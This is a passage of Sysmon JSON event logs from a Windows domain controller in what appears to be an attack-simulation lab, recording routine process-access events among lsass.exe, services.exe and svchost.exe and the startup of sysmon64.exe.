C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.887","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1195,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.895\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010BCC20000}\r\nTargetProcessId: 1216\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.895","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010BCC20000}","TargetProcessId":"1216","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1196,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.895\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010BCC20000}\r\nTargetProcessId: 1216\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.895","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010BCC20000}","TargetProcessId":"1216","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1197,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.873\r\nProcessGuid: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nProcessId: 2804\r\nImage: C:\\Windows\\sysmon64.exe\r\nFileVersion: 10.42\r\nDescription: System activity monitor\r\nProduct: Sysinternals Sysmon\r\nCompany: Sysinternals - www.sysinternals.com\r\nOriginalFileName: ?\r\nCommandLine: C:\\Windows\\sysmon64.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=384B6FC04A512CFE7A4E628942867D95,SHA256=80B110B91730729BE60C7D79C55FFF0EC893FD4CFB5F44D04C433EE8E95C5E20,IMPHASH=30777134873A03E5D01D04EDE5BEC51E\r\nParentProcessGuid: {41C8662E-1F61-5F25-0000-00102F530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.873","ProcessGuid":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","Image":"C:\\Windows\\sysmon64.exe","FileVersion":"10.42","Description":"System activity monitor","Product":"Sysinternals Sysmon","Company":"Sysinternals - www.sysinternals.com","OriginalFileName":"?","CommandLine":"C:\\Windows\\sysmon64.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=384B6FC04A512CFE7A4E628942867D95,SHA256=80B110B91730729BE60C7D79C55FFF0EC893FD4CFB5F44D04C433EE8E95C5E20,IMPHASH=30777134873A03E5D01D04EDE5BEC51E","ParentProcessGuid":"{41C8662E-1F61-5F25-0000-00102F530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1198,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.896\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 2548\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.896","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"2548","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1199,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.897\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.897","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1200,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.900\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.900","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1201,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.900\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.900","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1202,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.900\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.900","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1203,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.900\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 